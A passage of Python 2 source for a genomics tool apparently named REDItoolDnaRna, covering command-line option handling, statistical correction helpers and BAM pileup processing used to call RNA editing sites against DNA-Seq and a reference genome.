getstrand=1
if int(a)==1: unchange1,unchange2=1,0
elif int(a)==0: unchange1,unchange2=0,0
elif int(a)==2: unchange1,unchange2=0,1
elif int(a)==12: unchange1,unchange2=1,1
elif o == "-e": exh=1
elif o == "-V": exnosupp=1
elif o == "-E": gexh=1
elif o == "-d": exd=1
elif o == "-Y":
try:
wline=a.split(':')
wchr=wline[0]
wcoord=[int(x.replace(',','')) for x in wline[1].split('-')]
workR=(wchr,wcoord)
except: sys.exit('Working region not correct. Use the format chrxx:start-end')
fworkR=1
elif o == "-D": gexd=1
elif o == "-p": conc=1
elif o == "-P": gconc=1
elif o == "-I": sortbam=1
elif o == "-J": sortgbam=1
elif o == "-X": sortann=1
elif o == "-R": exinv=1
elif o == "-C": chunckval=int(a)
elif o == "-u": mq=1
elif o == "-U": gmq=1
elif o == "-M": slist=1
elif o == "-a":
rmpv = a
try:
rmp = [int(x) for x in rmpv.split('-')]
rmnuc=1
except: rmnuc=0
elif o == "-A":
grmpv = a
try:
grmp = [int(x) for x in grmpv.split('-')]
grmnuc=1
except: grmnuc=0
elif o == "-b":
blatfolder=a
if os.path.exists(blatfolder): blatr=1
elif o == "-B":
gblatfolder=a
if os.path.exists(gblatfolder): gblatr=1
elif o == "-l": rmsh=1
elif o == "-L": grmsh=1
elif o == "-v": vnuc=int(a)
elif o == "-n": mmf=float(a)
elif o == "-N": gmmf=float(a)
elif o == "-z": exms=1
elif o == "-Z": exnonh=1
elif o == "-W": usubs=[x.upper() for x in a.split(',') if x.strip()!='']
elif o == "-w":
splicefile=a
if os.path.exists(splicefile): exss=1
elif o == "-K":
exfile=a
if os.path.exists(exfile): expos=1
elif o == "-T":
wfile=a
if os.path.exists(wfile): uwf=1
elif o == "-r": nss=int(a)
elif o == "-G":
annfile=a
uann=1
elif o == "--gzip": gziptab=1
elif o == "--reads": greads=1
elif o == "--addP": addP=1
elif o == "--rmOver": rmOver=1
elif o == "--rmIndels": rmIndel=1
#elif o == "--fastq": fastq=a.split(',')
else:
assert False, "Unhandled Option"
#######
commandLine=' '.join(sys.argv[1:])
script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
params=[]
#Input parameters
params.append('REDItoolDnaRna version %s\n' %(version))
params.append('User command line: %s\n' %(commandLine))
params.append('Analysis ID: %s\n' %(pid))
params.append('Analysis time: %s\n' %(script_time))
params.append('-i --> RNA-Seq BAM file: %s\n' %(bamfile))
params.append('-j --> DNA-Seq BAM file(s): %s\n' %(','.join(dgbamfile.keys())))
params.append('-I --> Sort RNA-Seq BAM file: %i\n' %(sortbam))
params.append('-J --> Sort DNA-Seq BAM file: %i\n' %(sortgbam))
params.append('-f --> Reference file: %s\n' %(fastafile))
params.append('-C --> Base interval to explore: %i\n' %(chunckval))
params.append('-k --> Regions to exclude: %s\n' %(','.join(nochrs)))
params.append('-t --> Number of working threads: %i\n' %(NCPU))
params.append('-Y --> Work only on region %s:%i-%i : %i\n' %(workR[0],workR[1][0],workR[1][1],fworkR))
params.append('-o --> Output folder: %s\n' %(outfolder_))
params.append('-F --> Infolder folder: %s\n' %(infolder))
params.append('-M --> Save a list of columns with quality scores: %i\n' %(slist))
params.append('-c --> Min. per base coverage DNA-RNA: %i-%i\n' %(MINCOV,gMINCOV))
#params.append('-Q --> FastQ offset value DNA-RNA: %i-%i\n' %(gQVAL,QVAL))
params.append('-q --> Min. per base quality DNA-RNA: %i-%i\n' %(gMQUAL,MQUAL))
params.append('-m --> Min. mapping quality DNA-RNA: %i-%i\n' %(gMAPQ,MAPQ))
params.append('-O --> Min. homopolymeric length DNA-RNA: %i-%i\n' %(ghomo,homo))
params.append('-s --> Infer strand: %i - %i-%i\n' %(getstrand,unchange1,unchange2))
params.append('-g --> Use confidence: %i\n' %(useconf))
params.append('-x --> Strand confidence: %.2f\n' %(strconf))
params.append('-S --> Strand correction : %i\n' %(corrstr))
params.append('-G --> GFF annotation to infer strand: %s\n' %(annfile))
params.append('-K --> File with positions to exclude: %s\n' %(exfile))
params.append('-T --> Work only on given GFF positions: %s\n' %(wfile))
params.append('-X --> Sort annotation files: %i\n' %(sortann))
params.append('-e --> Exclude multi hits in RNA-Seq: %i\n' %(exh))
params.append('-E --> Exclude multi hits in DNA-Seq: %i\n' %(gexh))
params.append('-d --> Exclude duplicates in RNA-Seq: %i\n' %(exd))
params.append('-D --> Exclude duplicates in DNA-Seq: %i\n' %(gexd))
params.append('-p --> Use paired concordant reads in RNA-Seq: %i\n' %(conc))
params.append('-P --> Use paired concordant reads in DNA-Seq: %i\n' %(gconc))
params.append('-u --> Consider mapping quality in RNA-Seq: %i\n' %(mq))
params.append('-U --> Consider mapping quality in DNA-Seq: %i\n' %(gmq))
params.append('-a --> Trim x bases up and y bases down per RNA read: %i - %i-%i\n' %(rmnuc,rmp[0],rmp[1]))
params.append('-A --> Trim x bases up and y bases down per DNA read: %i - %i-%i\n' %(grmnuc,grmp[0],grmp[1]))
params.append('-b --> Blat folder for correction in RNA-Seq: %s\n' %(blatfolder))
params.append('-B --> Blat folder for correction in DNA-Seq: %s\n' %(gblatfolder))
params.append('-l --> Remove substitutions in homopolymeric regions for RNA-Seq: %i\n' %(rmsh))
params.append('-L --> Remove substitutions in homopolymeric regions for DNA-Seq: %i\n' %(grmsh))
params.append('-v --> Min. num. of reads supporting the variation: %i\n' %(vnuc))
params.append('-n --> Min. editing frequency for RNA-Seq: %.2f\n' %(mmf))
params.append('-N --> Min. variation frequency for DNA-Seq: %.2f\n' %(gmmf))
params.append('-z --> Exclude positions with multiple changes in RNA-Seq: %i\n' %(exms))
params.append('-Z --> Exclude positions with multiple changes in DNA-Seq: %i\n' %(exnonh))
params.append('-W --> Select RNA-Seq positions with defined changes: %s\n' %(','.join(usubs)))
params.append('-R --> Exclude invariant RNA-Seq positions: %i\n' %(exinv))
params.append('-V --> Exclude sites not supported by DNA-Seq: %i\n' %(exnosupp))
params.append('-w --> File containing splice sites annotations: %s\n' %(splicefile))
params.append('-r --> Num. of bases near splice sites to explore: %i\n' %(nss))
params.append('--gzip --> Gzip output files: %i\n' %(gziptab))
params.append('--reads --> Get reads containing reference mismatches: %i\n' %(greads))
params.append('--addP --> Extract reads alignments with reference mismatches in bed3 format, it requires --reads: %i\n' %(addP))
params.append('--rmIndels --> Remove positions with Indels in surrounding 5 bases: %i\n' %(rmIndel))
#######
def whereis(program):
for path in os.environ.get('PATH', '').split(':'):
if os.path.exists(os.path.join(path, program)) and not os.path.isdir(os.path.join(path, program)): return 1
return 0
def get_no(pvalue,siglevel,ngenes): # No Correction
lista=[]
pp=siglevel
y=0
for i in pvalue:
p=i[0]
if p<=siglevel:
lista.append(i)
y+=1
return lista,y,pp
def get_b(pvalue,siglevel,ngenes): # Bonferroni
pvalue.sort()
lista=[]
y=0
#bcorr=siglevel/ngenes
pp=1.0
for i in pvalue:
p=i[0]*ngenes
if p<=siglevel:
lista.append(i)
#lista[i[1]]=i[0]
y+=1
if p<pp: pp=p
#print "Passed:",y,pp
return lista,y,pp
def get_bh(pvalue,siglevel,ngenes): # B-H
pvalue.sort()
#print ngenes
lista=[]
x=1
y=0
p=0
for i in pvalue:
nf=i[0]*ngenes
fdr=nf/x
if fdr<=siglevel:
#dic[i[1]]=i[0]
lista.append(i)
p=i[0]
y+=1
x+=1
#print "Passed:",y,p
return lista,y,p
def getTail(pp):
if ftail=='l': return pp.left_tail
elif ftail=='r': return pp.right_tail
elif ftail=='t': return pp.two_tail
def getDicSS(dicp): # dicp = dizionario con le frequenze di sostituzione
dicpp={}
for i in dicp:
if i[0]!=i[1]:
dicpp[i]=1-dicp[i]
return dicpp
def getFreads(bases):
fread={'A':0,'C':0,'G':0,'T':0}
for i in range(4):
if i==0: fread['A']=bases[i]
elif i==1: fread['C']=bases[i]
elif i==2: fread['G']=bases[i]
elif i==3: fread['T']=bases[i]
return fread
def getSub(ref,fread,dics):
#fread={A,C,G,T}
nref=fread[ref.upper()]
sub=[(ref.upper()+i,nref,fread[i]) for i in fread if i!=ref.upper() and fread[i]!=0]
allsub=' '.join([x[0] for x in sub])
# lista del tipo [('AT', 50, 10), ('AG', 50, 2)]
res=[] #[(int(dics[i[0]]*(i[1]+i[2])),((i[1]+i[2])-exp1),pvalue(i[1],i[2],int(dics[i[0]]*(i[1]+i[2])),((i[1]+i[2])-exp1))) for i in sub]
for i in sub:
#if binomial:
# pval=bdtrc(i[2],i[1]+i[2],(1.0-dics[i[0]]))
# #pval=Bprob(i[2],i[1]+i[2],(1.0-dics[i[0]]))
# #print i[2],i[1]+i[2],(1.0-dics[i[0]]),pval
# obs1,obs2,exp1,exp2=0,0,0,0
obs1=i[1]
obs2=i[2]
exp1=int(dics[i[0]]*(i[1]+i[2]))
exp2=((i[1]+i[2]) - exp1)
pval=pvalue(obs1,obs2,exp1,exp2)
pval=getTail(pval)
res.append((i[0],obs1,obs2,exp1,exp2,str(pval)))
if len(res)==1: return res[0][5] #,allsub,fread
elif len(res) > 1:
rr=[float(x[-1]) for x in res]
idx=rr.index(min(rr))
return res[idx][5] #,allsub,fread
else: return '1.0' #,0,0
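# Count A/C/G/T occurrences in the pileup string and call substitutions
# against ref: a change is reported only when supported by at least VNUC
# reads at an observed frequency >= mfr. Returns (coverage, [A,C,G,T],
# substitution string, frequency of the best supported change).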
def BaseCount(seq,ref,mfr,VNUC):
b={'A':0,'C':0,'G':0,'T':0}
subs=[]
subv=[]
for i in seq.upper():
if b.has_key(i): b[i]+=1
for i in b:
if not b.has_key(ref): continue
if b[i]!=0 and i!=ref:
vv=float(b[i])/(b[i]+b[ref])
subv.append((b[i],vv,ref+i))
subv.sort()
subv.reverse()
for i in subv:
if i[0]>=VNUC and i[1]>=mfr: subs.append(i[2])
freq=0.0
if len(subs)==0: subs.append('-')
else: freq=subv[0][1]
return sum(b.values()),[b['A'],b['C'],b['G'],b['T']],' '.join(subs),'%.2f'%(freq)
def meanq(v,n):
try:m=float(v)/n
except: m=0.0
return '%.2f'%(m)
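# Return 1 when the current position, together with the flanking reference
# sequence (sequp upstream, seqdw downstream), lies in a homopolymer of
# length >= gh; used to discard substitutions in homopolymeric stretches.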
def rmHomo(sequp,seqdw,gh,ref):
if len(sequp)==0 and len(seqdw)==0: return 0
up,dw=0,0
for i in seqdw:
if i==ref:dw+=1
else:break
for i in sequp[::-1]:
if i==ref:up+=1
else:break
hlen=up+dw+1
if hlen >= gh : return 1
return 0
def prop(tot,va):
try: av=float(va)/tot
except: av=0.0
return av
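# Infer the strand of a position by majority vote over the per-read strand
# string; when -g 2 is used, a strand is called only if its fraction reaches
# the confidence threshold (strconf), otherwise '*' (undefined) is returned.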
def vstand(strand):
vv=[(strand.count('+'),'+'),(strand.count('-'),'-'),(strand.count('*'),'*')]
if vv[0][0]==0 and vv[1][0]==0: return '*'
if useconf:
totvv=sum([x[0] for x in vv[:2]])
if prop(totvv,vv[0][0])>=strconf: return '+'
if prop(totvv,vv[1][0])>=strconf: return '-'
return '*'
else:
if vv[0][0]==vv[1][0] and vv[2][0]==0: return '+'
return max(vv)[1]
def comp(s):
a={'A':'T','T':'A','C':'G','G':'C'}
ss=''
for i in s.upper():
if a.has_key(i): ss+=a[i]
elif i==' ': ss+=' '
elif i=='-': ss+='-'
else: ss+='N'
return ss
def comp2(s):
ss={}
a={'A':'T','T':'A','C':'G','G':'C'}
for i,j in enumerate('ACGT'): ss[a[j]]=s[i]
return str([ss['A'],ss['C'],ss['G'],ss['T']])
def vstrand(lista):
if len(lista)==0: return '2'
p=lista.count('+')
m=lista.count('-')
if p==len(lista): return '1'
elif m==len(lista): return '0'
else: return '2'
def getd(lines):
d={}
for i in lines:
l=i.split('\t')
if len(l)>=3:
if l[2]=='+': strand='1'
elif l[2]=='-': strand='0'
else: strand='2'
else: strand='2'
d[int(l[1])]=strand
return d
def checkSubs(s):
if s=='-': return 1
for i in s.split():
if i in usubs: return 1
return 0
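# makeCluster and newCoords merge overlapping GFF feature intervals into
# non-overlapping clusters and clamp the merged span to the current chunk
# boundaries, so pileups are only computed where features exist.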
def makeCluster(allcoord):
cluster=[]
remaining=[]
c1=allcoord[0][0]
c2=allcoord[0][1]
for i in range(len(allcoord)):
if allcoord[i]!=(c1,c2):
if c1<=allcoord[i][0]<=c2:
cluster.append(allcoord[i])
if allcoord[i][1]>c2:
c2=allcoord[i][1]
else:
remaining.append(allcoord[i])
else:
cluster.append((c1,c2))
return (c1,c2),remaining
def newCoords(interval,start,end):
coords=[]
interval.sort()
while len(interval)!=0:
coord,interval=makeCluster(interval)
coords.append(coord)
c1,c2=coords[0][0],coords[-1][1]
if c1 < start: c1=start
if c2>end: c2=end
	if c1==c2: c1=start-1 # MODIFIED
if c1<0: c1=0 #fixed rare bug
return coords,c1,c2
def checkPos(coords,pos):
for i in coords:
if i[0]<=pos<=i[1]: return 1
return 0
def parseFeat(line):
l=line.split('\t')
cc=(int(l[3])-1,int(l[4])-1)
return cc
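# The normBy* helpers below walk the parallel per-base arrays built for a
# pileup column (sequence, strand, qualities, blat flags) and keep only the
# entries passing a given filter: expected strand, blat-validated reads,
# non-overlapping mates, or indel-free neighborhoods.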
def normByStrand(seq_,strand_,squal_,mystrand_):
st='+'
if mystrand_=='0': st='-'
seq,qual,squal='',0,[]
for i in range(len(seq_)):
if strand_[i]==st:
seq+=seq_[i]
qual+=squal_[i] #-QVAL
squal.append(squal_[i])
return seq,qual,squal
def normByBlat(seq_,strand_,squal_,blatc_):
seq,qual,squal,strand='',0,[],''
for i in range(len(seq_)):
if blatc_[i]=='1':
seq+=seq_[i]
qual+=squal_[i]
squal.append(squal_[i])
strand+=strand_[i]
return seq,qual,squal,strand
def normByOverlap(seq_,strand_,squal_,blatc_,over_):
seq,qual,squal,strand,blatc='',0,[],'',[]
for i in range(len(seq_)):
if over_[i]==0:
seq+=seq_[i]
qual+=squal_[i]
squal.append(squal_[i])
strand+=strand_[i]
blatc.append(blatc_[i])
return seq,qual,squal,strand,blatc
def normByIndels(seq_,strand_,squal_,blatc_,indels_):
seq,qual,squal,strand,blatc='',0,[],'',[]
for i in range(len(seq_)):
if indels_[i]==0:
seq+=seq_[i]
qual+=squal_[i]
squal.append(squal_[i])
strand+=strand_[i]
try: blatc.append(blatc_[i])
except: pass
return seq,qual,squal,strand,blatc
def testBlat(blc):
if blc.count('1') > blc.count('0'): return 1
return 0
def countIndels(lista):
for i in lista:
if i.count(None)>0: return 1
return 0
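# For mate pairs overlapping the same position, mark one observation for
# removal: if both mates show the same status, the duplicate observation is
# dropped; if they disagree, the mate carrying the mismatch is dropped.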
def getOverlap(lista):
r=[0 for x in range(len(lista))]
l=[x[0] for x in lista]
us={}
x=0
for i in lista:
if l.count(i[0])==2:
s='='
if i[1]!=i[2]: s='!'
if us.has_key(i[0]): us[i[0]].append((x,s))
else: us[i[0]]=[(x,s)]
x+=1
for i in us:
v=us[i]
if v[0][1]==v[1][1]: r[v[0][0]]=1
else:
if v[0][1]=='!': r[v[0][0]]=1
elif v[1][1]=='!': r[v[1][0]]=1
return r
###########################################################
###########################################################
script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
sys.stderr.write("Script time --> START: %s\n"%(script_time))
sys.stderr.write("Analysis ID: %s\n"%(pid))
###########################################################
#if greads:
# if not whereis('seqtk'): sys.exit('seqtk program not found.')
if not os.path.exists(bamfile):
usage()
sys.exit('RNA-Seq BAM file %s not found.' %(bamfile))
if sortbam:
sys.stderr.write('Sorting RNA-Seq BAM file.\n')
pysam.sort(bamfile,'sorted_%s'%(pid))
os.rename(bamfile,bamfile+'_old')
os.rename('sorted_%s.bam'%(pid),bamfile)
sys.stderr.write('Indexing RNA-Seq BAM file.\n')
pysam.index(bamfile)
if not os.path.exists(bamfile+'.bai') and not sortbam:
sys.stderr.write('Indexing RNA-Seq BAM file.\n')
pysam.index(bamfile)
###########################################################
dgdic={} # dictionary mapping chr -> DNA-Seq bam file
for i in gbamfile:
if not os.path.exists(i[0]):
sys.stderr.write('DNA-Seq BAM file %s not found.\n' %(i[0]))
sys.stderr.write('Working without DNA-Seq BAM file %s.\n' %(i[0]))
del dgbamfile[i[0]]
else:
if sortgbam:
sys.stderr.write('Sorting DNA-Seq BAM file %s.\n' %(i[0]))
pysam.sort(i[0],'sorted_%s'%(pid))
os.rename(i[0],i[0]+'_old')
os.rename('sorted_%s.bam'%(pid),i[0])
sys.stderr.write('Indexing DNA-Seq BAM file %s.\n' %(i[0]))
pysam.index(i[0])
if not os.path.exists(i[0]+'.bai') and not sortgbam:
sys.stderr.write('Indexing DNA-Seq BAM file %s.\n' %(i[0]))
pysam.index(i[0])
if len(gbamfile)==0:
sys.stderr.write('Working without DNA-Seq BAM file(s).\n')
nogbam=1
else:
for i in dgbamfile:
idxinfo=pysam.idxstats(i)
for j in idxinfo.split('\n'): #MOD
l=(j.strip()).split('\t')
if l[0] in ['*','']: continue #MOD
if int(l[2])+int(l[3]) > 0: dgdic[l[0]]=i
###########################################################
if not os.path.exists(fastafile):
usage()
sys.exit('Fasta file %s not found.' %(fastafile))
if not os.path.exists(fastafile+'.fai'):
sys.stderr.write('Indexing Fasta file.\n')
pysam.faidx(fastafile)
###########################################################
# Check reference for name consistency
grefs=dgdic.keys()
rrefs={}
ridxinfo=pysam.idxstats(bamfile)
for j in ridxinfo.split('\n'): #MOD
l=(j.strip()).split('\t')
if l[0] in ['*','']: continue #MOD
if int(l[2])+int(l[3]) > 0: rrefs[l[0]]=int(l[1])
frefs=[]
fidxinfo=open(fastafile+'.fai')
for j in fidxinfo:
l=(j.strip()).split('\t')
if l[0]=='': continue
frefs.append(l[0])
fidxinfo.close()
# in rna-seq
rnof=[]
for i in rrefs.keys():
if i not in frefs: sys.stderr.write('WARNING: Region %s in RNA-Seq not found in reference file.\n' %(i))
if len(gbamfile)!=0:
for i in grefs:
if i not in frefs: sys.stderr.write('WARNING: Region %s in DNA-Seq not found in reference file.\n' %(i))
###########################################################
###########################################################
# Annotation file for working regions
if uwf:
if not os.path.exists(wfile):
usage()
sys.exit('GFF file %s not found.' %(wfile))
if sortann:
if not whereis('grep'): sys.exit('grep command not found.')
if not whereis('sort'): sys.exit('sort command not found.')
sys.stderr.write('Sorting GFF file.\n')
scmd='grep ^"#" %s; grep -v ^"#" %s | sort -k1,1 -k4,4n > %s' %(wfile,wfile,'workf_%s'%(pid))
os.system(scmd)
os.rename(wfile,wfile+'_old')
os.rename('workf_%s'%(pid),wfile)
if not os.path.exists(wfile+'.tbi'):
sys.stderr.write('Indexing GFF file.\n')
wfile=pysam.tabix_index(wfile, preset='gff')
###########################################################
# Annotation file for strand detection
if uann:
getstrand=0
if not os.path.exists(annfile):
usage()
sys.exit('Annotation file %s not found.' %(annfile))
if sortann:
if not whereis('grep'): sys.exit('grep command not found.')
if not whereis('sort'): sys.exit('sort command not found.')
sys.stderr.write('Sorting annotation file.\n')
scmd='grep ^"#" %s; grep -v ^"#" %s | sort -k1,1 -k4,4n > %s' %(annfile,annfile,'annotation_%s'%(pid))
os.system(scmd)
os.rename(annfile,annfile+'_old')
os.rename('annotation_%s'%(pid),annfile)
if not os.path.exists(annfile+'.tbi'):
sys.stderr.write('Indexing annotation file.\n')
annfile=pysam.tabix_index(annfile, preset='gff')
###########################################################
# Annotation file to exclude positions
if expos:
if not os.path.exists(exfile):
usage()
sys.exit('File %s not found.' %(exfile))
if sortann:
if not whereis('grep'): sys.exit('grep command not found.')
if not whereis('sort'): sys.exit('sort command not found.')
sys.stderr.write('Sorting file.\n')
scmd='grep ^"#" %s; grep -v ^"#" %s | sort -k1,1 -k4,4n > %s' %(exfile,exfile,'exfile_%s'%(pid))
os.system(scmd)
os.rename(exfile,exfile+'_old')
os.rename('exfile_%s'%(pid),exfile)
if not os.path.exists(exfile+'.tbi'):
sys.stderr.write('Indexing %s file.\n' %(exfile))
exfile=pysam.tabix_index(exfile, preset='gff')
###########################################################
#mainbam=pysam.Samfile(bamfile,"rb")
#regions=mainbam.references
#regionslens=mainbam.lengths
#mainbam.close()
dicregions=dict(rrefs.items())
#dicregions=dict([(regions[x],regionslens[x]) for x in range(len(regions))])
chrs=[x for x in dicregions.keys() if x not in nochrs]
if fworkR: sys.stderr.write('Analysis on region %s:%i-%i.\n' %(workR[0],workR[1][0],workR[1][1]))
else: sys.stderr.write('Analysis on %i regions.\n' %(len(chrs)))
###########################################################
if infolder!='': outfolder=os.path.join(outfolder_,'DnaRna_%s_%s' %(infolder,pid))
else: outfolder=os.path.join(outfolder_,'DnaRna_%s' %(pid))
if not os.path.exists(outfolder):
splitfolder=os.path.split(outfolder)
if not os.path.exists(splitfolder[0]): os.mkdir(splitfolder[0])
os.mkdir(outfolder)
outtable=os.path.join(outfolder,'outTable_%s' %(pid))
if slist:
slistfile=os.path.join(outfolder,'outPileupRNA_%s' %(pid))
if len(gbamfile)!=0: gslistfile=os.path.join(outfolder,'outPileupDNA_%s' %(pid))
#write command line and input parameters
f=open(os.path.join(outfolder,'parameters.txt'),'w')
f.writelines(params)
f.close()
###########################################################
d={}
if blatr:
badblat=blatfolder #os.path.join(blatfolder,'blatseqs_%s.bad'%(chr))
if os.path.exists(badblat):
sys.stderr.write('Using Blat mapping for RNAseq...\n')
f=open(badblat)
for i in f:
l=(i.strip()).split()
d[l[0]+'_'+l[1]]=int(l[1])
f.close()
sys.stderr.write('Found %i reads.\n'%(len(d)))
gd={}
if gblatr:
gbadblat=gblatfolder #os.path.join(blatfolder,'blatseqs_%s.bad'%(chr))
if os.path.exists(gbadblat):
sys.stderr.write('Using Blat mapping for DNAseq...\n')
f=open(gbadblat)
for i in f:
l=(i.strip()).split()
gd[l[0]+'_'+l[1]]=int(l[1])
f.close()
sys.stderr.write('Found %i reads.\n'%(len(gd)))
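# Worker entry point: myinput is a '$'-joined string
# "chr$bamfile$start$length$suffix". Each worker scans its region in chunks
# of chunckval bases, optionally together with the matching DNA-Seq BAM, and
# writes per-region table/pileup files that are merged after all jobs end.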
def exploreBAM(myinput):
isgbam=1
inputs=myinput.split('$')
chr,bamfile,start_region,lenregion,suff_=inputs[0],inputs[1],int(inputs[2]),int(inputs[3]),inputs[4]
if not dgdic.has_key(chr): isgbam=0
outfile=os.path.join(outfolder,'table_%s'%(suff_))
if slist:
		if gziptab: outrna=gzip.open(os.path.join(outfolder,'pileupRNA_%s.gz'%(suff_)),'wb')
		else: outrna=open(os.path.join(outfolder,'pileupRNA_%s'%(suff_)),'w')
		if not nogbam and isgbam:
			if gziptab: outdna=gzip.open(os.path.join(outfolder,'pileupDNA_%s.gz'%(suff_)),'wb')
			else: outdna=open(os.path.join(outfolder,'pileupDNA_%s'%(suff_)),'w')
#d,di,gd={},{},{}
di,gd={},{}
bam=pysam.Samfile(bamfile,"rb")
if not nogbam and isgbam:
gbam=pysam.Samfile(dgdic[chr],"rb")
fasta=pysam.Fastafile(fastafile)
if uann: tabix=pysam.Tabixfile(annfile)
if expos: extabix=pysam.Tabixfile(exfile)
if uwf: wtabix=pysam.Tabixfile(wfile)
if gziptab:
outfile=outfile+'.gz'
out=gzip.open(outfile,'wb')
else: out=open(outfile,'w')
sys.stderr.write('Started analysis on region: %s:%i-%i\n'%(chr,start_region+1,lenregion))
#sys.stderr.write('OUTFILE: %s\n' %(outfile))
# if blatr:
# badblat=os.path.join(blatfolder,'blatseqs_%s.bad'%(chr))
# if os.path.exists(badblat):
# sys.stderr.write('Using Blat mapping for region %s\n'%(chr))
# f=open(badblat)
# for i in f:
# l=(i.strip()).split()
# d[l[0]+'_'+l[1]]=int(l[1])
# f.close()
# sys.stderr.write('Found %i reads for region %s\n'%(len(d),chr))
if gblatr:
gbadblat=os.path.join(gblatfolder,'blatseqs_%s.bad'%(chr))
if os.path.exists(gbadblat):
sys.stderr.write('Using Blat mapping for DNA region %s\n'%(chr))
f=open(gbadblat)
for i in f:
l=(i.strip()).split()
gd[l[0]+'_'+l[1]]=int(l[1])
f.close()
sys.stderr.write('Found %i reads for region %s\n'%(len(gd),chr))
if exss:
if os.path.exists(splicefile):
sys.stderr.write('Loading known splice sites for region %s\n'%(chr))
f=open(splicefile)
for i in f:
l=(i.strip()).split()
if l[0]!=chr: continue
st,tp,cc=l[4],l[3],int(l[1])
if st=='+' and tp=='D':
for j in range(nss): di[cc+(j+1)]=0
if st=='+' and tp=='A':
for j in range(nss): di[cc-(j+1)]=0
if st=='-' and tp=='D':
for j in range(nss): di[cc-(j+1)]=0
if st=='-' and tp=='A':
for j in range(nss): di[cc+(j+1)]=0
f.close()
sys.stderr.write('Loaded %i positions for %s\n'%(len(di),chr))
if greads:
outreads=open(os.path.join(outfolder,'readsRNA_%s'%(suff_)),'w')
grdb={}
if addP:
outAddP=open(os.path.join(outfolder,'readsPosRNA_%s'%(suff_)),'w')
grdb2={}
for kpos in range(start_region,lenregion,chunckval):
startk,endk=kpos,(kpos+chunckval)-1
if endk > lenregion: endk=lenregion-1
#sys.stderr.write('%i %i\n'%(startk,endk))
		# check features in the given region if a GFF is provided
if uwf:
if chr in wtabix.contigs:
wfeat=[parseFeat(feat) for feat in wtabix.fetch(reference=chr,start=startk,end=endk)]
if len(wfeat)==0: continue
wcoords,startk,endk=newCoords(wfeat,startk,endk)
else: continue
# get FASTA sequence
#print startk,endk
#refgenome=fasta.fetch(chr,startk,endk+1).upper()
#print refgenome
# explore dna-seq bam
#####################
gdic={}
if not nogbam and isgbam:
for pileupcolumn in gbam.pileup(chr,startk,endk,stepper='nofilter', max_depth=MAX_DEPTH):
if uwf and not checkPos(wcoords,pileupcolumn.reference_pos): continue
if not startk<=pileupcolumn.reference_pos<=endk: continue
gref=fasta.fetch(chr,pileupcolumn.reference_pos,pileupcolumn.reference_pos+1).upper()
gseq,gqual,gstrand,gblatc,gsqual='',0,'','',[]
if grmsh:
if ((pileupcolumn.reference_pos+1)-ghomo)-1 < 0: sequp=''
else: sequp=(fasta.fetch(chr,((pileupcolumn.reference_pos+1)-ghomo)-1,(pileupcolumn.reference_pos+1)-1)).upper()
seqdw=(fasta.fetch(chr,pileupcolumn.reference_pos+1,(pileupcolumn.reference_pos+1)+ghomo)).upper()
				for pileupread in pileupcolumn.pileups: # for each base of the pileup column
if pileupread.is_del: continue
if pileupread.alignment.is_qcfail: continue
#gs,gq,gt,gqq=pileupread.alignment.seq[pileupread.qpos].upper(),ord(pileupread.alignment.qual[pileupread.qpos])-gQVAL,'*',pileupread.alignment.qual[pileupread.qpos]
# multiple hits
if gexh:
if pileupread.alignment.is_secondary: continue
if pileupread.alignment.has_tag('NH'):
if pileupread.alignment.get_tag('NH') > 1: continue
# duplicates
if gexd and pileupread.alignment.is_duplicate: continue
					# if paired-end
					if gconc: # if only paired reads must be used
						# skip unpaired reads
						if not pileupread.alignment.is_paired: continue
						# skip non-concordant pairs
						if not pileupread.alignment.is_proper_pair: continue
						# skip concordant pairs mapped in the same orientation
flag=pileupread.alignment.flag
if pileupread.alignment.is_duplicate: flag=flag-1024
if pileupread.alignment.is_secondary: flag=flag-256
if flag in [67,131,115,179]: continue
# mapping quality
if gmq and pileupread.alignment.mapping_quality < gMAPQ: continue
					# if base quality >= the minimum quality
gs,gq,gt,gqq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.query_qualities[pileupread.query_position]
if gq >= gMQUAL and pileupcolumn.reference_pos in pileupread.alignment.get_reference_positions():
if grmnuc:
							grlen=pileupread.alignment.query_length #pileupread.alignment.qlen # length of this specific read
gqp=pileupread.query_position
							if grmp[0]>0: # remove positions at the 5' end
if pileupread.alignment.is_reverse:
if (pileupread.alignment.query_alignment_end-grmp[1])+1 <=gqp<= pileupread.alignment.query_alignment_end: continue
else:
if pileupread.alignment.query_alignment_start <=gqp<= (pileupread.alignment.query_alignment_start+grmp[0])-1: continue
							if grmp[1]>0: # remove positions at the 3' end
if pileupread.alignment.is_reverse:
if pileupread.alignment.query_alignment_start <=gqp<= (pileupread.alignment.query_alignment_start+grmp[0])-1: continue
else:
if (pileupread.alignment.query_alignment_end-grmp[1])+1 <=gqp<= pileupread.alignment.query_alignment_end: continue
						# if the parent read does not map uniquely according to Blat
if gblatr:
rt=0
if pileupread.alignment.is_read1: rt=1
elif pileupread.alignment.is_read2: rt=2
rname=pileupread.alignment.query_name+'_%i'%(rt)
if gd.has_key(rname): gblatc+='0' #continue
else: gblatc+='1'
						# if the base differs from the reference
						# if in a homopolymeric region, discard
if grmsh and rmHomo(sequp,seqdw,ghomo,gref): continue
gseq+=gs
gqual+=gq
gstrand+=gt
gsqual.append(gqq)
if gseq.strip()!='':
if gblatr:
						if testBlat(gblatc): gseq,gqual,gsqual,gstrand=normByBlat(gseq,gstrand,gsqual,gblatc)
else: continue
gcov,gbcomp,gsubs,gfreq=BaseCount(gseq,gref,gmmf,0)
if gcov < gMINCOV: continue
gmqua=meanq(gqual,len(gseq))
					ghinfo=0 # non-homozygous
					if gsubs=='-': ghinfo=1 # homozygous
gdic[pileupcolumn.reference_pos]=([str(gcov),gmqua,str(gbcomp),gsubs,gfreq],ghinfo)
if slist:
if not nogbam and isgbam: outdna.write('\t'.join([chr,str(pileupcolumn.reference_pos+1),gref,gseq,gsqual])+'\n')
#####################
# explore rna-seq bam
#print startk,endk, wcoords
for pileupcolumn in bam.pileup(chr,startk,endk,stepper='nofilter',max_depth=MAX_DEPTH):
#print chr,startk,endk
#print dir(pileupcolumn)
if uwf and not checkPos(wcoords,pileupcolumn.reference_pos): continue
#print pileupcolumn.reference_pos
if not startk<=pileupcolumn.reference_pos<=endk: continue
#print
#print chr,pileupcolumn.reference_pos+1
ref=fasta.fetch(chr,pileupcolumn.reference_pos,pileupcolumn.reference_pos+1).upper()
#seq,qual,strand,squal,blatc='',0,'','',''
